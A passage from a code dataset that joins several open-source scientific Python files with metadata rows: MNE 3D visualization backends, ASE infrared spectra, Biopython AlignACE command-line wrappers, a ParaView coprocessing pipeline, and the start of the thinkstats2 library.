                except ImportError as exc:
                    errors[name] = str(exc)  # remember why this one failed
                else:
                    MNE_3D_BACKEND = name
                    break
            else:
                # Every candidate failed to import; report all reasons.
                raise RuntimeError(
                    'Could not load any valid 3D backend:\n' +
                    "\n".join(f'{key}: {val}' for key, val in errors.items()))
        else:
            # Config supplied a name: validate it, then import it.
            MNE_3D_BACKEND = _check_3d_backend_name(MNE_3D_BACKEND)
            _reload_backend(MNE_3D_BACKEND)
    MNE_3D_BACKEND = _check_3d_backend_name(MNE_3D_BACKEND)
    return MNE_3D_BACKEND
@contextmanager
def use_3d_backend(backend_name):
    """Create a 3d visualization context using the designated backend.

    See :func:`mne.viz.set_3d_backend` for more details on the available
    3d backends and their capabilities.

    Parameters
    ----------
    backend_name : {'mayavi', 'pyvistaqt', 'notebook'}
        The 3d backend to use in the context.
    """
    old_backend = set_3d_backend(backend_name)
    try:
        yield
    finally:
        if old_backend is not None:
            try:
                set_3d_backend(old_backend)
            except Exception:
                # Best-effort restore: a failure to re-activate the old
                # backend must not mask an exception raised by the
                # with-block body.
                pass
@contextmanager
def _use_test_3d_backend(backend_name, interactive=False):
    """Create a testing viz context.

    Combines :func:`_actors_invisible` (marks the run as testing), the
    requested backend, and the backend's own ``_testing_context``.

    Parameters
    ----------
    backend_name : str
        The 3d backend to use in the context.
    interactive : bool
        If True, ensure interactive elements are accessible.
    """
    with _actors_invisible():
        with use_3d_backend(backend_name):
            with backend._testing_context(interactive):
                yield
@contextmanager
def _actors_invisible():
    """Context manager that turns on ``MNE_3D_BACKEND_TESTING`` for its
    duration, restoring the previous value on exit."""
    global MNE_3D_BACKEND_TESTING
    orig_testing = MNE_3D_BACKEND_TESTING
    MNE_3D_BACKEND_TESTING = True
    try:
        yield
    finally:
        MNE_3D_BACKEND_TESTING = orig_testing
@fill_doc
def set_3d_view(figure, azimuth=None, elevation=None,
                focalpoint=None, distance=None, roll=None,
                reset_camera=True):
    """Configure the view of the given scene.

    Parameters
    ----------
    figure : object
        The scene which is modified.
    %(azimuth)s
    %(elevation)s
    %(focalpoint)s
    %(distance)s
    %(roll)s
    reset_camera : bool
        If True, reset the camera properties beforehand.
    """
    # Thin wrapper: delegates entirely to the active backend module.
    backend._set_3d_view(figure=figure, azimuth=azimuth,
                         elevation=elevation, focalpoint=focalpoint,
                         distance=distance, roll=roll,
                         reset_camera=reset_camera)
def set_3d_title(figure, title, size=40):
    """Configure the title of the given scene.

    Parameters
    ----------
    figure : object
        The scene which is modified.
    title : str
        The title of the scene.
    size : int
        The size of the title.
    """
    # Thin wrapper: delegates entirely to the active backend module.
    backend._set_3d_title(figure=figure, title=title, size=size)
def create_3d_figure(size, bgcolor=(0, 0, 0), smooth_shading=True,
                     handle=None, scene=True):
    """Return an empty figure based on the current 3d backend.

    .. warning:: Proceed with caution when the renderer object is
                 returned (with ``scene=False``) because the _Renderer
                 API is not necessarily stable enough for production,
                 it's still actively in development.

    Parameters
    ----------
    size : tuple
        The dimensions of the 3d figure (width, height).
    bgcolor : tuple
        The color of the background.
    smooth_shading : bool
        If True, smooth shading is enabled. Defaults to True.
    handle : int | None
        The figure identifier.
    scene : bool
        Specify if the returned object is the scene. If False,
        the renderer object is returned. Defaults to True.

    Returns
    -------
    figure : object
        The requested empty scene or the renderer object if
        ``scene=False``.
    """
    # Build a renderer through the active backend, then hand back either
    # its scene or the renderer itself depending on ``scene``.
    rend = _get_renderer(fig=handle, size=size, bgcolor=bgcolor,
                         smooth_shading=smooth_shading)
    return rend.scene() if scene else rend
def get_brain_class():
    """Return the proper Brain class based on the current 3d backend.

    Returns
    -------
    brain : object
        The Brain class corresponding to the current 3d backend.
    """
    if get_3d_backend() == "mayavi":
        # PySurfer's mayavi-based Brain; imported lazily since surfer is
        # only needed for this backend.
        from surfer import Brain
        _require_version('surfer', 'stc.plot', '0.9')
    else:  # PyVista
        from ...viz._brain import Brain
    return Brain
|
pravsripad/mne-python
|
mne/viz/backends/renderer.py
|
Python
|
bsd-3-clause
| 11,507
|
[
"Mayavi"
] |
b8491dd2b7cdc1f7411b3b8652816ac25faa8f427705a862a86ba6ebfc873023
|
# -*- coding: utf-8 -*-
"""Infrared intensities"""
import pickle
from math import sin, pi, sqrt, exp, log
from os import remove
from os.path import isfile
import numpy as np
import ase.units as units
from ase.io.trajectory import PickleTrajectory
from ase.parallel import rank, barrier
from ase.vibrations import Vibrations
class InfraRed(Vibrations):
"""Class for calculating vibrational modes and infrared intensities
using finite difference.
The vibrational modes are calculated from a finite difference
approximation of the Dynamical matrix and the IR intensities from
a finite difference approximation of the gradient of the dipole
moment. The method is described in:
D. Porezag, M. R. Peterson:
"Infrared intensities and Raman-scattering activities within
density-functional theory",
Phys. Rev. B 54, 7830 (1996)
The calculator object (calc) linked to the Atoms object (atoms) must
have the attribute:
>>> calc.get_dipole_moment(atoms)
In addition to the methods included in the ``Vibrations`` class
the ``InfraRed`` class introduces two new methods;
*get_spectrum()* and *write_spectra()*. The *summary()*, *get_energies()*,
*get_frequencies()*, *get_spectrum()* and *write_spectra()*
methods all take an optional *method* keyword. Use
method='Frederiksen' to use the method described in:
T. Frederiksen, M. Paulsson, M. Brandbyge, A. P. Jauho:
"Inelastic transport theory from first-principles: methodology
and applications for nanoscale devices",
Phys. Rev. B 75, 205413 (2007)
atoms: Atoms object
The atoms to work on.
indices: list of int
List of indices of atoms to vibrate. Default behavior is
to vibrate all atoms.
name: str
Name to use for files.
delta: float
Magnitude of displacements.
nfree: int
Number of displacements per degree of freedom, 2 or 4 are
supported. Default is 2 which will displace each atom +delta
and -delta in each cartesian direction.
directions: list of int
Cartesian coordinates to calculate the gradient of the dipole moment in.
For example directions = 2 only dipole moment in the z-direction will
be considered, whereas for directions = [0, 1] only the dipole
moment in the xy-plane will be considered. Default behavior is to
use the dipole moment in all directions.
Example:
>>> from ase import *
>>> from ase.infrared import InfraRed
>>> water = read('water.traj') # read pre-relaxed structure of water molecule
>>> calc = Vasp(prec='Accurate',
... ediff=1E-8,
... isym=0,
... idipol=4, # calculate the total dipole moment
... dipol=water.get_center_of_mass(scaled=True),
... ldipol=True)
>>> water.set_calculator(calc)
>>> ir = InfraRed(water)
>>> ir.run()
>>> ir.summary()
-------------------------------------
Mode Frequency Intensity
# meV cm^-1 (D/Å)^2 amu^-1
-------------------------------------
0 16.9i 136.2i 1.6108
1 10.5i 84.9i 2.1682
2 5.1i 41.1i 1.7327
3 0.3i 2.2i 0.0080
4 2.4 19.0 0.1186
5 15.3 123.5 1.4956
6 195.5 1576.7 1.6437
7 458.9 3701.3 0.0284
8 473.0 3814.6 1.1812
-------------------------------------
Zero-point energy: 0.573 eV
Static dipole moment: 1.833 D
Maximum force on atom in `eqiulibrium`: 0.0026 eV/Å
"""
def __init__(self, atoms, indices=None, name='ir', delta=0.01, nfree=2, directions=None):
    """Set up a finite-difference IR calculation.

    atoms: Atoms object to work on.
    indices: list of int, atoms to displace (default: all atoms).
    name: str, base name for the pickle files.
    delta: float, displacement magnitude.
    nfree: int, displacements per degree of freedom (2 or 4).
    directions: cartesian components of the dipole gradient to keep
        (default: all three).
    """
    assert nfree in [2, 4]
    self.atoms = atoms
    if atoms.constraints:
        # Parenthesized call form prints identically on Python 2 (single
        # argument) and is valid syntax on Python 3.
        print("WARNING! \n Your Atoms object is constrained. Some forces may be unintended set to zero. \n")
    self.calc = atoms.get_calculator()
    if indices is None:
        indices = range(len(atoms))
    self.indices = np.asarray(indices)
    self.nfree = nfree
    # delta is encoded in the file name so runs with different
    # displacements do not clobber each other.
    self.name = name + '-d%.3f' % delta
    self.delta = delta
    self.H = None
    if directions is None:
        self.directions = np.asarray([0, 1, 2])
    else:
        self.directions = np.asarray(directions)
    # Marker used by the parent Vibrations class to also store dipoles.
    self.ir = True
def read(self, method='standard', direction='central'):
    """Read the finite-difference pickle files and compute the dynamical
    matrix, vibrational modes and infrared intensities.

    method: 'standard' or 'frederiksen' (acoustic sum-rule correction).
    direction: only 'central' differences are implemented.
    """
    self.method = method.lower()
    self.direction = direction.lower()
    assert self.method in ['standard', 'frederiksen']
    if direction != 'central':
        raise NotImplementedError('Only central difference is implemented at the moment.')

    # "Static" dipole moment and residual forces at equilibrium.
    name = '%s.eq.pckl' % self.name
    with open(name) as fd:
        forces_zero, dipole_zero = pickle.load(fd)
    self.dipole_zero = (sum(dipole_zero**2)**0.5) * units.Debye
    self.force_zero = max([sum((forces_zero[j])**2)**0.5 for j in self.indices])

    ndof = 3 * len(self.indices)
    H = np.empty((ndof, ndof))
    dpdx = np.empty((ndof, 3))
    r = 0
    for a in self.indices:
        for i in 'xyz':
            name = '%s.%d%s' % (self.name, a, i)
            with open(name + '-.pckl') as fd:
                fminus, dminus = pickle.load(fd)
            with open(name + '+.pckl') as fd:
                fplus, dplus = pickle.load(fd)
            if self.nfree == 4:
                with open(name + '--.pckl') as fd:
                    fminusminus, dminusminus = pickle.load(fd)
                with open(name + '++.pckl') as fd:
                    fplusplus, dplusplus = pickle.load(fd)
            if self.method == 'frederiksen':
                # Acoustic sum rule: the displaced atom carries minus the
                # sum of the forces on all atoms.
                fminus[a] += -fminus.sum(0)
                fplus[a] += -fplus.sum(0)
                if self.nfree == 4:
                    # BUGFIX: correct the double-displacement forces with
                    # their own sums; the original reused fminus/fplus here.
                    fminusminus[a] += -fminusminus.sum(0)
                    fplusplus[a] += -fplusplus.sum(0)
            if self.nfree == 2:
                H[r] = (fminus - fplus)[self.indices].ravel() / 2.0
                dpdx[r] = (dminus - dplus)
            if self.nfree == 4:
                # Five-point central difference stencils.
                H[r] = (-fminusminus + 8*fminus - 8*fplus + fplusplus)[self.indices].ravel() / 12.0
                dpdx[r] = (-dplusplus + 8*dplus - 8*dminus + dminusminus) / 6.0
            H[r] /= 2 * self.delta
            dpdx[r] /= 2 * self.delta
            # Zero dipole-gradient components that were not requested
            # (the original assigned the same element twice).
            for n in range(3):
                if n not in self.directions:
                    dpdx[r][n] = 0
            r += 1

    # Symmetrize and mass-weight the Hessian, then diagonalize.
    H += H.copy().T
    self.H = H
    m = self.atoms.get_masses()
    self.im = np.repeat(m[self.indices]**-0.5, 3)
    omega2, modes = np.linalg.eigh(self.im[:, None] * H * self.im)
    self.modes = modes.T.copy()

    # IR intensities from the dipole gradient along each normal mode.
    # (j // 3 keeps the index an int on Python 3 as well.)
    dpdq = np.array([dpdx[j] / sqrt(m[self.indices[j // 3]] * units._amu / units._me)
                     for j in range(ndof)])
    dpdQ = np.dot(dpdq.T, modes)
    dpdQ = dpdQ.T
    intensities = np.array([sum(dpdQ[j]**2) for j in range(ndof)])
    # Conversion factor to energies in eV.
    s = units._hbar * 1e10 / sqrt(units._e * units._amu)
    self.hnu = s * omega2.astype(complex)**0.5
    # Conversion factor from atomic units to (D/Angstrom)^2/amu.
    conv = units.Debye**2 * units._amu / units._me
    self.intensities = intensities * conv
def summary(self, method='standard', direction='central'):
    """Print a table of mode energies, frequencies and IR intensities.

    All prints use the single-argument call form, which produces the
    same output on Python 2 and is valid syntax on Python 3.
    """
    hnu = self.get_energies(method, direction)
    # Conversion factor eV -> cm^-1.
    s = 0.01 * units._e / units._c / units._hplanck
    print('-------------------------------------')
    print(' Mode Frequency Intensity')
    print(' # meV cm^-1 (D/Å)^2 amu^-1')
    print('-------------------------------------')
    for n, e in enumerate(hnu):
        if e.imag != 0:
            # Imaginary frequency: flag it with an 'i' suffix.
            c = 'i'
            e = e.imag
        else:
            c = ' '
        print('%3d %6.1f%s %7.1f%s %9.4f' % (n, 1000 * e, c, s * e, c, self.intensities[n]))
    print('-------------------------------------')
    print('Zero-point energy: %.3f eV' % self.get_zero_point_energy())
    print('Static dipole moment: %.3f D' % self.dipole_zero)
    print('Maximum force on atom in `eqiulibrium`: %.4f eV/Å' % self.force_zero)
    # print('') emits a blank line on both Python 2 and 3 (a bare
    # 'print()' would print an empty tuple on Python 2).
    print('')
def get_spectrum(self, start=800, end=4000, npts=None, width=4, type='Gaussian', method='standard', direction='central'):
    """Get infrared spectrum.

    The method returns wavenumbers in cm^-1 with corresonding absolute infrared intensity.
    Start and end point, and width of the Gaussian/Lorentzian should be given in cm^-1.
    """
    self.type = type.lower()
    assert self.type in ['gaussian', 'lorentzian']
    if not npts:
        # About ten points per line width, end points included; int() keeps
        # this an integer under true division as well.
        npts = int((end - start) / width) * 10 + 1
    frequencies = self.get_frequencies(method, direction).real
    intensities = self.intensities
    # BUGFIX: compare the normalized self.type (the original compared the
    # raw 'type' argument, so type='Lorentzian' silently fell through to
    # the Gaussian branch).
    if self.type == 'lorentzian':
        intensities = intensities * width * pi / 2.
    else:
        sigma = width / 2. / sqrt(2. * log(2.))
    # linspace yields exactly npts samples; the original arange(start,
    # end+ediff, ediff) could produce one extra point and overrun the
    # spectrum array.  (np.float is also gone from modern NumPy.)
    energies = np.linspace(start, end, npts)
    spectrum = np.empty(npts, float)
    for i, energy in enumerate(energies):
        if self.type == 'lorentzian':
            spectrum[i] = (intensities * 0.5 * width / pi / ((frequencies - energy)**2 + 0.25 * width**2)).sum()
        else:
            spectrum[i] = (intensities * np.exp(-(frequencies - energy)**2 / 2. / sigma**2)).sum()
    return [energies, spectrum]
def write_spectra(self, out='ir-spectra.dat', start=800, end=4000, npts=None, width=10, type='Gaussian', method='standard', direction='central'):
    """Write out infrared spectrum to file.

    First column is the wavenumber in cm^-1, the second column the
    absolute infrared intensities, and the third column the absorbance
    scaled so that data runs from 1 to 0. Start and end point, and width
    of the Gaussian/Lorentzian should be given in cm^-1.
    """
    energies, spectrum = self.get_spectrum(start, end, npts, width, type, method, direction)

    # Absorbance scaled so that the data runs from 1 to 0.
    spectrum2 = 1. - spectrum / spectrum.max()
    outdata = np.empty([len(energies), 3])
    outdata.T[0] = energies
    outdata.T[1] = spectrum
    outdata.T[2] = spectrum2
    # Context manager guarantees the file is closed even on error.
    with open(out, 'w') as fd:
        for row in outdata:
            fd.write('%.3f %15.5e %15.5e \n' % (row[0], row[1], row[2]))
|
freephys/python_ase
|
ase/infrared.py
|
Python
|
gpl-3.0
| 10,849
|
[
"ASE",
"Gaussian",
"VASP"
] |
1051246c073a796b3cc53ec9facc46911dd62749a3daecc6c3fa37845f2bfc3b
|
# Copyright 2003-2009 by Bartek Wilczynski. All rights reserved.
# Revisions copyright 2009 by Peter Cock.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""This module provides code to work with the standalone version of AlignACE,
for motif search in DNA sequences.
AlignACE homepage:
http://arep.med.harvard.edu/mrnadata/mrnasoft.html
AlignACE Citations:
Computational identification of cis-regulatory elements associated with
groups of functionally related genes in Saccharomyces cerevisiae,
Hughes, JD, Estep, PW, Tavazoie S, & GM Church, Journal of Molecular
Biology 2000 Mar 10;296(5):1205-14.
Finding DNA Regulatory Motifs within Unaligned Non-Coding Sequences
Clustered by Whole-Genome mRNA Quantitation,
Roth, FR, Hughes, JD, Estep, PE & GM Church, Nature Biotechnology
1998 Oct;16(10):939-45.
"""
from __future__ import print_function
from Bio.Application import AbstractCommandline, _Option, _Argument
import warnings
from Bio import BiopythonDeprecationWarning
class AlignAceCommandline(AbstractCommandline):
    """Create a commandline for the AlignAce program (DEPRECATED).

    Example:
    >>> from Bio.motifs.applications import AlignAceCommandline
    >>> in_file = "sequences.fasta"
    >>> alignace_cline = AlignAceCommandline(infile=in_file, gcback=0.55)
    >>> print(alignace_cline)
    AlignACE -i sequences.fasta -gcback 0.55

    You would typically run the command line with alignace_cline() or via
    the Python subprocess module, as described in the Biopython tutorial.
    """

    def __init__(self, cmd="AlignACE", **kwargs):
        # Runtime deprecation notice; the wrapper is only kept for
        # backwards compatibility with existing scripts.
        warnings.warn("""The AlignACE application wrapper is deprecated and
                      is likely to be removed in a future release of Biopython,
                      since an up to date version of the AlignACE software
                      cannot be obtained anymore. If you have a copy of
                      AlignACE 4, please consider contacting the Biopython
                      developers.""", BiopythonDeprecationWarning)
        # Each _Option maps a keyword argument onto the equivalent
        # AlignACE command-line flag; checker_function validates the
        # value's type when it is assigned.
        self.parameters = \
            [
                _Option(["-i", "infile"],
                        "Input Sequence file in FASTA format.",
                        checker_function=lambda x: isinstance(x, str),
                        equate=False,
                        filename=True),
                _Option(["-numcols", "numcols"],
                        "Number of columns to align",
                        equate=False,
                        checker_function=lambda x: isinstance(x, int)),
                _Option(["-expect", "expect"],
                        "number of sites expected in model",
                        equate=False,
                        checker_function=lambda x: isinstance(x, int)),
                _Option(["-gcback", "gcback"],
                        "background fractional GC content of input sequence",
                        equate=False,
                        checker_function=lambda x: isinstance(x, float)),
                _Option(["-minpass", "minpass"],
                        "minimum number of non-improved passes in phase 1",
                        equate=False,
                        checker_function=lambda x: isinstance(x, int)),
                _Option(["-seed", "seed"],
                        "set seed for random number generator (time)",
                        equate=False,
                        checker_function=lambda x: isinstance(x, int)),
                _Option(["-undersample", "undersample"],
                        "possible sites / (expect * numcols * seedings)",
                        equate=False,
                        checker_function=lambda x: isinstance(x, int)),
                _Option(["-oversample", "oversample"],
                        "1/undersample",
                        equate=False,
                        checker_function=lambda x: isinstance(x, int)),
            ]
        # Delegates flag parsing/validation to the generic base class.
        AbstractCommandline.__init__(self, cmd, **kwargs)
class CompareAceCommandline(AbstractCommandline):
    """Create a commandline for the CompareAce program.

    Example:
    >>> from Bio.motifs.applications import CompareAceCommandline
    >>> m1_file = "sequences1.fasta"
    >>> m2_file = "sequences2.fasta"
    >>> compareace_cline = CompareAceCommandline(motif1=m1_file, motif2=m2_file)
    >>> print(compareace_cline)
    CompareACE sequences1.fasta sequences2.fasta

    You would typically run the command line with compareace_cline() or via
    the Python subprocess module, as described in the Biopython tutorial.
    """

    def __init__(self, cmd="CompareACE", **kwargs):
        # Runtime deprecation notice, same situation as AlignAceCommandline.
        warnings.warn("""The CompareACE application wrapper is deprecated and
                      is likely to be removed in a future release of Biopython,
                      since an up to date version of the AlignACE software
                      cannot be obtained anymore. If you have a copy of
                      AlignACE 4, please consider contacting the Biopython
                      developers.""", BiopythonDeprecationWarning)
        # CompareACE takes two positional file arguments, not flags.
        self.parameters = \
            [
                _Argument(["motif1"],
                          "name of file containing motif 1",
                          checker_function=lambda x: isinstance(x, str),
                          filename=True),
                _Argument(["motif2"],
                          "name of file containing motif 2",
                          checker_function=lambda x: isinstance(x, str),
                          filename=True),
            ]
        AbstractCommandline.__init__(self, cmd, **kwargs)
def _test():
    """Run the module's doctests (PRIVATE)."""
    print("Running alignace doctests...")
    import doctest
    # testmod returns a (failures, attempted) pair; we only run for the
    # side effect of reporting failures.
    results = doctest.testmod()
    del results
    print("Done")


if __name__ == "__main__":
    _test()
|
Ambuj-UF/ConCat-1.0
|
src/Utils/Bio/motifs/applications/_alignace.py
|
Python
|
gpl-2.0
| 5,755
|
[
"Biopython"
] |
47f28d70c74da1156ea74c99d7692ffd7d1e4ac43428cd0a65d0dfea3c27b290
|
# Pull in paraview.simple only if it is not already in this namespace.
try:
    paraview.simple  # probe: raises NameError/AttributeError when absent
except (NameError, AttributeError):
    # Narrowed from a bare 'except:' so unrelated errors are not swallowed.
    from paraview.simple import *
def RequestDataDescription(datadescription):
    """Callback to populate the request for the current timestep."""
    if datadescription.GetForceOutput() == True:
        # Forced output: request all fields and meshes from every input.
        for i in range(datadescription.GetNumberOfInputDescriptions()):
            description = datadescription.GetInputDescription(i)
            description.AllFieldsOn()
            description.GenerateMeshOn()
        return

    timestep = datadescription.GetTimeStep()
    input_name = 'input'
    description = datadescription.GetInputDescriptionByName(input_name)
    # NOTE(review): timestep % 1 is always 0, so the else branch looks
    # unreachable; kept as-is since the generator template emits this form.
    if timestep % 1 == 0:
        description.AllFieldsOn()
        description.GenerateMeshOn()
    else:
        description.AllFieldsOff()
        description.GenerateMeshOff()
def DoCoProcessing(datadescription):
    "Callback to do co-processing for current timestep"
    # Writers and views are rebuilt on every invocation of this callback.
    cp_writers = []
    cp_views = []
    timestep = datadescription.GetTimeStep()

    # Producer wrapping the simulation's "input" grid.
    u10000001_datbin = CreateProducer( datadescription, "input" )

    # Parallel image-data writer, emitted every timestep (frequency 1).
    ParallelImageDataWriter1 = CreateWriter( XMLPImageDataWriter, "filename_%t.pvti", 1, cp_writers )

    # Write every registered writer that is due at this timestep.
    for writer in cp_writers:
        if timestep % writer.cpFrequency == 0 or datadescription.GetForceOutput() == True:
            writer.FileName = writer.cpFileName.replace("%t", str(timestep))
            writer.UpdatePipeline()

    # Dead branch from the generator template: would rescale the lookup
    # table of every visible representation to the current data range.
    if False : # rescale data range
        import math
        for view in cp_views:
            if timestep % view.cpFrequency == 0 or datadescription.GetForceOutput() == True:
                reps = view.Representations
                for rep in reps:
                    if hasattr(rep, 'Visibility') and rep.Visibility == 1 and hasattr(rep, 'MapScalars') and rep.MapScalars != '':
                        input = rep.Input
                        input.UpdatePipeline() #make sure range is up-to-date
                        lut = rep.LookupTable
                        if lut == None:
                            continue
                        if rep.ColorAttributeType == 'POINT_DATA':
                            datainformation = input.GetPointDataInformation()
                        elif rep.ColorAttributeType == 'CELL_DATA':
                            datainformation = input.GetCellDataInformation()
                        else:
                            print 'something strange with color attribute type', rep.ColorAttributeType
                        if lut.VectorMode != 'Magnitude' or datainformation.GetArray(rep.ColorArrayName).GetNumberOfComponents() == 1:
                            datarange = datainformation.GetArray(rep.ColorArrayName).GetRange(lut.VectorComponent)
                        else:
                            # Magnitude range from per-component ranges.
                            datarange = [0,0]
                            for i in range(datainformation.GetArray(rep.ColorArrayName).GetNumberOfComponents()):
                                for j in range(2):
                                    datarange[j] += datainformation.GetArray(rep.ColorArrayName).GetRange(i)[j]*datainformation.GetArray(rep.ColorArrayName).GetRange(i)[j]
                            datarange[0] = math.sqrt(datarange[0])
                            datarange[1] = math.sqrt(datarange[1])
                        # RGBPoints is a flat [x, r, g, b, ...] list.
                        rgbpoints = lut.RGBPoints.GetData()
                        numpts = len(rgbpoints)/4
                        minvalue = min(datarange[0], rgbpoints[0])
                        maxvalue = max(datarange[1], rgbpoints[(numpts-1)*4])
                        if minvalue != rgbpoints[0] or maxvalue != rgbpoints[(numpts-1)*4]:
                            # rescale all of the points
                            oldrange = rgbpoints[(numpts-1)*4] - rgbpoints[0]
                            newrange = maxvalue - minvalue
                            newrgbpoints = list(rgbpoints)
                            for v in range(numpts):
                                newrgbpoints[v*4] = minvalue+(rgbpoints[v*4] - rgbpoints[0])*newrange/oldrange
                            lut.RGBPoints.SetData(newrgbpoints)

    # Render and save every view that is due at this timestep.
    for view in cp_views:
        if timestep % view.cpFrequency == 0 or datadescription.GetForceOutput() == True:
            fname = view.cpFileName
            fname = fname.replace("%t", str(timestep))
            if view.cpFitToScreen != 0:
                if view.IsA("vtkSMRenderViewProxy") == True:
                    view.ResetCamera()
                elif view.IsA("vtkSMContextViewProxy") == True:
                    view.ResetDisplay()
                else:
                    print ' do not know what to do with a ', view.GetClassName()
            WriteImage(fname, view, Magnification=view.cpMagnification)

    # explicitly delete the proxies -- we do it this way to avoid problems with prototypes
    tobedeleted = GetNextProxyToDelete()
    while tobedeleted != None:
        Delete(tobedeleted)
        tobedeleted = GetNextProxyToDelete()
def GetNextProxyToDelete():
    """Return the next deletable proxy, or None when only protected
    proxies (prototypes, timekeeper, pq helpers) remain."""
    iterator = servermanager.ProxyIterator()
    for proxy in iterator:
        group = iterator.GetGroup()
        if "prototypes" in group:
            continue
        if group == 'timekeeper' or "pq_helper_proxies" in group:
            continue
        return proxy
    return None
def CreateProducer(datadescription, gridname):
    "Creates a producer proxy for the grid"
    if not datadescription.GetInputDescriptionByName(gridname):
        # Parenthesized raise is valid on Python 2 and 3; the original
        # 'raise RuntimeError, msg' form is a syntax error on Python 3.
        raise RuntimeError("Simulation input name '%s' does not exist" % gridname)
    grid = datadescription.GetInputDescriptionByName(gridname).GetGrid()
    producer = PVTrivialProducer()
    producer.GetClientSideObject().SetOutput(grid)
    # Structured grid types additionally need their whole extent declared.
    if grid.IsA("vtkImageData") == True or grid.IsA("vtkStructuredGrid") == True or grid.IsA("vtkRectilinearGrid") == True:
        extent = datadescription.GetInputDescriptionByName(gridname).GetWholeExtent()
        producer.WholeExtent= [ extent[0], extent[1], extent[2], extent[3], extent[4], extent[5] ]
    producer.UpdatePipeline()
    return producer
def CreateWriter(proxy_ctor, filename, freq, cp_writers):
    """Instantiate a writer proxy, tag it with its co-processing
    settings and register it in *cp_writers*."""
    new_writer = proxy_ctor()
    new_writer.FileName = filename
    for attr_name, attr_value in (("cpFrequency", freq),
                                  ("cpFileName", filename)):
        new_writer.add_attribute(attr_name, attr_value)
    cp_writers.append(new_writer)
    return new_writer
def CreateView(proxy_ctor, filename, freq, fittoscreen, magnification, cp_views):
    """Instantiate a view proxy, attach its co-processing settings and
    register it in *cp_views*.

    proxy_ctor: zero-argument callable producing the view proxy.
    filename: output file name pattern (may contain %t for the timestep).
    freq: output frequency in timesteps.
    fittoscreen: nonzero to reset the camera before each save.
    magnification: magnification factor passed to WriteImage.
    cp_views: list the new view is appended to.
    """
    view = proxy_ctor()
    # The original set cpFileName twice; setting it once is equivalent.
    view.add_attribute("cpFileName", filename)
    view.add_attribute("cpFrequency", freq)
    view.add_attribute("cpFitToScreen", fittoscreen)
    view.add_attribute("cpMagnification", magnification)
    cp_views.append(view)
    return view
|
openmichigan/PSNM
|
KleinGordon/Programs/KleinGordon3dMpiFFTParaView/pipeline_vtis.py
|
Python
|
bsd-2-clause
| 6,773
|
[
"ParaView"
] |
454b60b1175dc9c99c2e203e70fe10f190f1e54fefb83a610e89adcc7cbc8c6f
|
"""This file contains code for use with "Think Stats" and
"Think Bayes", both by Allen B. Downey, available from greenteapress.com
Copyright 2014 Allen B. Downey
License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html
"""
from __future__ import print_function, division
"""This file contains class definitions for:
Hist: represents a histogram (map from values to integer frequencies).
Pmf: represents a probability mass function (map from values to probs).
_DictWrapper: private parent class for Hist and Pmf.
Cdf: represents a discrete cumulative distribution function
Pdf: represents a continuous probability density function
"""
import bisect
import copy
import logging
import math
import random
import re
from collections import Counter
from operator import itemgetter
import thinkplot
import numpy as np
import pandas
import scipy
from scipy import stats
from scipy import special
from scipy import ndimage
from io import open
ROOT2 = math.sqrt(2)
def RandomSeed(x):
    """Seed both the stdlib and the NumPy random number generators.

    x: int seed
    """
    for seed_func in (random.seed, np.random.seed):
        seed_func(x)
def Odds(p):
    """Convert a probability to odds in favor.

    Example: p=0.75 means 75 for and 25 against, or 3:1 odds in favor.

    By convention Odds(1) is positive infinity rather than a
    division-by-zero error.

    p: float 0-1

    Returns: float odds
    """
    return float('inf') if p == 1 else p / (1 - p)
def Probability(o):
    """Convert odds in favor to the corresponding probability.

    Example: o=2 means 2:1 odds in favor, or 2/3 probability.

    o: float odds, strictly positive

    Returns: float probability
    """
    total = o + 1
    return o / total
def Probability2(yes, no):
    """Convert odds given as two counts into a probability.

    Example: yes=2, no=1 means 2:1 odds in favor, or 2/3 probability.

    yes, no: int or float odds in favor
    """
    total = yes + no
    return yes / total
class Interpolator(object):
    """Linear interpolation between two sorted, parallel sequences.

    Attributes:
        xs: sorted list
        ys: sorted list
    """

    def __init__(self, xs, ys):
        self.xs = xs
        self.ys = ys

    def Lookup(self, x):
        """Map x to the corresponding (interpolated) y."""
        return self._Bisect(x, self.xs, self.ys)

    def Reverse(self, y):
        """Map y back to the corresponding (interpolated) x."""
        return self._Bisect(y, self.ys, self.xs)

    def _Bisect(self, value, sources, targets):
        """Interpolate value from sources into targets, clamping at both ends."""
        if value <= sources[0]:
            return targets[0]
        if value >= sources[-1]:
            return targets[-1]
        hi = bisect.bisect(sources, value)
        lo = hi - 1
        frac = 1.0 * (value - sources[lo]) / (sources[hi] - sources[lo])
        return targets[lo] + frac * 1.0 * (targets[hi] - targets[lo])
class _DictWrapper(object):
"""An object that contains a dictionary."""
def __init__(self, obj=None, label=None):
"""Initializes the distribution.
obj: Hist, Pmf, Cdf, Pdf, dict, pandas Series, list of pairs
label: string label
"""
self.label = label if label is not None else '_nolegend_'
self.d = {}
# flag whether the distribution is under a log transform
self.log = False
if obj is None:
return
if isinstance(obj, (_DictWrapper, Cdf, Pdf)):
self.label = label if label is not None else obj.label
if isinstance(obj, dict):
self.d.update(obj.items())
elif isinstance(obj, (_DictWrapper, Cdf, Pdf)):
self.d.update(obj.Items())
elif isinstance(obj, pandas.Series):
self.d.update(obj.value_counts().iteritems())
else:
# finally, treat it like a list
self.d.update(Counter(obj))
if len(self) > 0 and isinstance(self, Pmf):
self.Normalize()
def __hash__(self):
return id(self)
def __str__(self):
cls = self.__class__.__name__
return '%s(%s)' % (cls, str(self.d))
__repr__ = __str__
def __eq__(self, other):
return self.d == other.d
def __len__(self):
return len(self.d)
def __iter__(self):
return iter(self.d)
def iterkeys(self):
"""Returns an iterator over keys."""
return iter(self.d)
def __contains__(self, value):
return value in self.d
def __getitem__(self, value):
return self.d.get(value, 0)
def __setitem__(self, value, prob):
self.d[value] = prob
def __delitem__(self, value):
del self.d[value]
def Copy(self, label=None):
"""Returns a copy.
Make a shallow copy of d. If you want a deep copy of d,
use copy.deepcopy on the whole object.
label: string label for the new Hist
returns: new _DictWrapper with the same type
"""
new = copy.copy(self)
new.d = copy.copy(self.d)
new.label = label if label is not None else self.label
return new
def Scale(self, factor):
"""Multiplies the values by a factor.
factor: what to multiply by
Returns: new object
"""
new = self.Copy()
new.d.clear()
for val, prob in self.Items():
new.Set(val * factor, prob)
return new
def Log(self, m=None):
"""Log transforms the probabilities.
Removes values with probability 0.
Normalizes so that the largest logprob is 0.
"""
if self.log:
raise ValueError("Pmf/Hist already under a log transform")
self.log = True
if m is None:
m = self.MaxLike()
for x, p in self.d.items():
if p:
self.Set(x, math.log(p / m))
else:
